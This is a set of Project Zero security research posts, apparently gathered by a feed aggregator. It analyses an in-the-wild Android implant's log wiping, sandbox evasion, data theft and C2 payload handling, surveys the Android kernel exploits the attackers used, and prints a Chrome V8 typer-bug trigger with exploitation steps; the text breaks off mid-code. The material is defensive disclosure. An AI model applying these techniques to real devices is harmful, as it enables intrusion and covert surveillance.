The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server either when stage 3 is automatically reaching out to the C2 server, or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2”, adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.

Clean-Up

This code is very diligent with trying to clean up its tracks, both while it's running and once it finishes. While it’s running, the binary forks a new process which runs code that is responsible for cleaning up logs while the other code is executing. This other process does the following to clean up stage 3’s tracks:

  • Connect to the socket /dev/socket/logd and clear all logs
  • Execute klogctl(5,0,0) which is SYSLOG_ACTION_CLEAR and clears the ring buffer
  • Unlink all of the files in the following directories:
  • /data/tombstones
  • /data/misc/audit
  • /data/system/dropbox
  • /data/anr
  • /data/log
  • Unlinks the file /cache/recovery/last_avc_msg_recovery

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters. It then calls getaddrinfo on this random hostname. It’s trying to find a host that will cause getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will attempt 3 different addresses before it will bail if none of them return EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames and so the code is trying to detect this type of malware analysis environment.

Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted block in argument 1 at offset 0x14C7. In this binary that is 8.8.8.8:53, the Google DNS server. The code will connect to the DNS server via a socket and then send a Type A query for the randomly generated host name and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”.  If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 Server.

Handshake with the C2 Server

The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server.  Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging  (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods for collecting this data. The most common is to read system properties. They have 2 different ways to read system properties:

  • Call __system_property_get by doing dlopen(/system/lib/libc.so) and dlsym('__system_property_get').
  • Executing getprop in popen

To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the code for the function. Basically, the code is the number that the function is listed in the AIDL file. This means it can change with each new Android release. The developers of this binary hardcoded the service code for each android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK version 8-20, the code is 5 for SDK version 21, and the code is 7 for SDK versions 22-29.

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid

Logging Information

As described in the Error Processing section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they are documenting a condition that is less severe than an error. These are distinctions that the developers included in their coding.

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It’s calculated by calculating the crc32 value for the 0x10 bytes at offset 0x1CD8 in the decrypted data block and then adding the “identification code”.

struct compressedMessage {

    uint compressedDataLength;

    uint uncompressedDataLength;

    uint messageCode;

    BYTE * dataPointer;

    BYTE[4096] data;

};

Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1

 User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3

Host: REDACTED:443

Connection: keep-alive

Content-Type:application/octet-stream

Content-Length:%u

Cookie: %s

The “Cookie” field is two values from the decrypted data block: sid and uid. The values for these two keys are base64 encoded values from the decrypted data block.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system or a shared library ELF file which can be executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.

If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands which it’ll “process”.  The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section. It’s an identification code + the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts them from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then be executed.

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Write the buffer of the response to a file with the name from step #2 + “abc” concatenated to the end: /mnt/XXXXXXabc
  4. Write a specific value from memory to the file with the name from step #2 with “xyz” concatenated to the end: /mnt/XXXXXXxyz. This specific value can be changed through the 2nd function that is exported by the stage 3 binary: d.

func2 - Fork child process and inject code using ptrace.

This function forks a new process where the child will call the function init from an ELF library, then the parent will inject the code from the response into the child process using ptrace. The ELF library that is opened with dlopen and then init is called on is named /system/bin/%016lx%016lx with both values being the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function will write the buffer to either the provided file path in the third argument or it will generate a new file path.  If it’s generating a new temporary file name, the code will go down the following list of directory names beginning with /cache in the first directory that it can stat, it will create the temporary file using mkstemp(“%s/XXXXXX”).

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in in the fifth argument.

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked and that child process executes by calling execve on the file.
  • 0x2713: The response is an ELF file.  The file is written to a temporary file on the device using func3. A child process is forked and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/system@framework@boot.oat), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath, if it doesn’t exist delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/system@framework@boot.oat), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.

Conclusion

That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used all publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploit for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.

...more

In-the-Wild Series: Android Exploits

Published: 2021-01-12 17:37:00

Popularity: 21

Author: Ryan

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020

Introduction

After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:



Each of the "xyz_register" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.

 

Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

iovy

The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.


Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".

iovy_pxn2

The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).

iovy_pxn3

The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.

0569

The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".

0820

The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".

COW

The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.

9568

The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root". 
Baidu Security Lab: "KARMA shows you offense and defense".

Conclusion

Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively,  perhaps exploit server URLs that we had access to were specifically configured for a user that they know uses an older device that would be vulnerable to one of these exploits?

Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.

About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.

...more

In-the-Wild Series: Chrome Infinity Bug

Published: 2021-01-12 17:36:00

Popularity: 8

Author: Ryan

🤖: "chrome crashes"

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.

Brief introduction to typer bugs

One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.

For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:

a = Math.min(a, 1);

if (a > 2) {

  return 3;

}

Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:

a = vuln(a);

let array = [1, 2, 3];

return array[a];

If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that at a certain optimization phase, can be expressed by the following pseudocode:

if (a >= array.length) {

  deoptimize();

}

let elements = array.[[elements]];

return elements.get(a);

get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.

The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.

A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:

a = vuln(a); // predicted = false; actual = true

a = a * 10;  // predicted = 0; actual = 10

let array = [1, 2, 3];

return array[a];

Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.

At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.

Induction variable analysis

The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:

Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {

  [...]

  // We only handle integer induction variables (otherwise ranges

  // do not apply and we cannot do anything).

  if (!initial_type.Is(typer_->cache_->kInteger) ||

      !increment_type.Is(typer_->cache_->kInteger)) {

    // Fallback to normal phi typing, but ensure monotonicity.

    // (Unfortunately, without baking in the previous type,

    // monotonicity might be violated because we might not yet have

    // retyped the incrementing operation even though the increment's

    // type might been already reflected in the induction variable

    // phi.)

    Type type = NodeProperties::IsTyped(node)

                    ? NodeProperties::GetType(node)

                    : Type::None();

    for (int i = 0; i < arity; ++i) {

      type = Type::Union(type, Operand(node, i), zone());

    }

    return type;

  }

  // If we do not have enough type information for the initial value

  // or the increment, just return the initial value's type.

  if (initial_type.IsNone() ||

      increment_type.Is(typer_->cache_->kSingletonZero)) {

    return initial_type;

  }

  [...]

  InductionVariable::ArithmeticType arithmetic_type =

      induction_var->Type();

  double min = -V8_INFINITY;

  double max = V8_INFINITY;

  double increment_min;

  double increment_max;

  if (arithmetic_type ==

      InductionVariable::ArithmeticType::kAddition) {

    increment_min = increment_type.Min();

    increment_max = increment_type.Max();

  } else {

    DCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction,

              arithmetic_type);

    increment_min = -increment_type.Max();

    increment_max = -increment_type.Min();

  }

  if (increment_min >= 0) {

    // increasing sequence

    min = initial_type.Min();

    for (auto bound : induction_var->upper_bounds()) {

      Type bound_type = TypeOrNone(bound.bound);

      // If the type is not an integer, just skip the bound.

      if (!bound_type.Is(typer_->cache_->kInteger)) continue;

      // If the type is not inhabited, then we can take the initial

      // value.

      if (bound_type.IsNone()) {

        max = initial_type.Max();

        break;

      }

      double bound_max = bound_type.Max();

      if (bound.kind == InductionVariable::kStrict) {

        bound_max -= 1;

      }

      max = std::min(max, bound_max + increment_max);

    }

    // The upper bound must be at least the initial value's upper

    // bound.

    max = std::max(max, initial_type.Max());

  } else if (increment_max <= 0) {

    // decreasing sequence

    [...]

  } else {

    // Shortcut: If the increment can be both positive and negative,

    // the variable can go arbitrarily far, so just return integer.

    return typer_->cache_->kInteger;

  }

  [...]

  return Type::Range(min, max, typer_->zone());

}

Now, imagine the compiler processing the following JavaScript code:

for (var i = initial; i < bound; i += increment) { [...] }

In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.

Note that the algorithm only works with integers, otherwise a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type holds two unusual properties that have made the vulnerability possible:

  • +Infinity and -Infinity belong to it, whereas NaN and -0 don’t.
  • The type is not closed under addition, i.e., adding two integers doesn’t always result in an integer. Namely, +Infinity + -Infinity yields NaN.

Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:

for (var i = -Infinity; i < 0; i += Infinity) { }

This one line is enough to trigger the issue. The exploit author has had to make only two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:

function trigger(argument) {

  var j = 0;

  var increment = 100;

  if (argument > 2) {

    increment = Infinity;

  }

  for (var i = -Infinity; i <= -Infinity; i += increment) {

    j++;

    if (j == 20) {

      break;

    }

  }

[...]

The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.

Exploitation

The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors. For the ease of the reader, we've modified it to be compatible with x64 as well.

[...]

  // The comments display the current value of the variable i, the type

  // inferred by the compiler, and the machine type used to store

  // the value at each step.

  // Initially:

  // actual = NaN, inferred = (-Infinity, +Infinity)

  // representation = double

  i = Math.max(i, 0x100000800);

  // After step one:

  // actual = NaN, inferred = [0x100000800; +Infinity)

  // representation = double

  i = Math.min(0x100000801, i);

  // After step two:

  // actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]

  // representation = int64_t

  i -= 0x1000007fa;

  // After step three:

  // actual = -2042, inferred = [6, 7]

  // representation = int32_t

  i >>= 1;

  // After step four:

  // actual = -1021, inferred = 3

  // representation = int32_t

  i += 10;

  // After step five:

  // actual = -1011, inferred = 13

  // representation = int32_t

[...]

The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.

Reduction ConstantFoldingReducer::Reduce(Node* node) {

  DisallowHeapAccess no_heap_access;

  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&

      node->op()->HasProperty(Operator::kEliminatable) &&

      node->opcode() != IrOpcode::kFinishRegion) {

    Node* constant = TryGetConstant(jsgraph(), node);

    if (constant != nullptr) {

      ReplaceWithValue(node, constant);

      return Replace(constant);

[...]

If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore not marked as eliminable.

Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:

Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {

[...]

} else if (arity == 1) {

  Node* length = NodeProperties::GetValueInput(node, 2);

  Type length_type = NodeProperties::GetType(length);

  if (!length_type.Maybe(Type::Number())) {

    // Handle the single argument case, where we know that the value

    // cannot be a valid Array length.

    elements_kind = GetMoreGeneralElementsKind(

        elements_kind, IsHoleyElementsKind(elements_kind)

                           ? HOLEY_ELEMENTS

                           : PACKED_ELEMENTS);

    return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

  }

  if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&

      length_type.Max() <= kElementLoopUnrollLimit &&

      length_type.Min() == length_type.Max()) {

    int capacity = static_cast<int>(length_type.Max());

    return ReduceNewArray(node, length, capacity, *initial_map,

                          elements_kind, allocation,

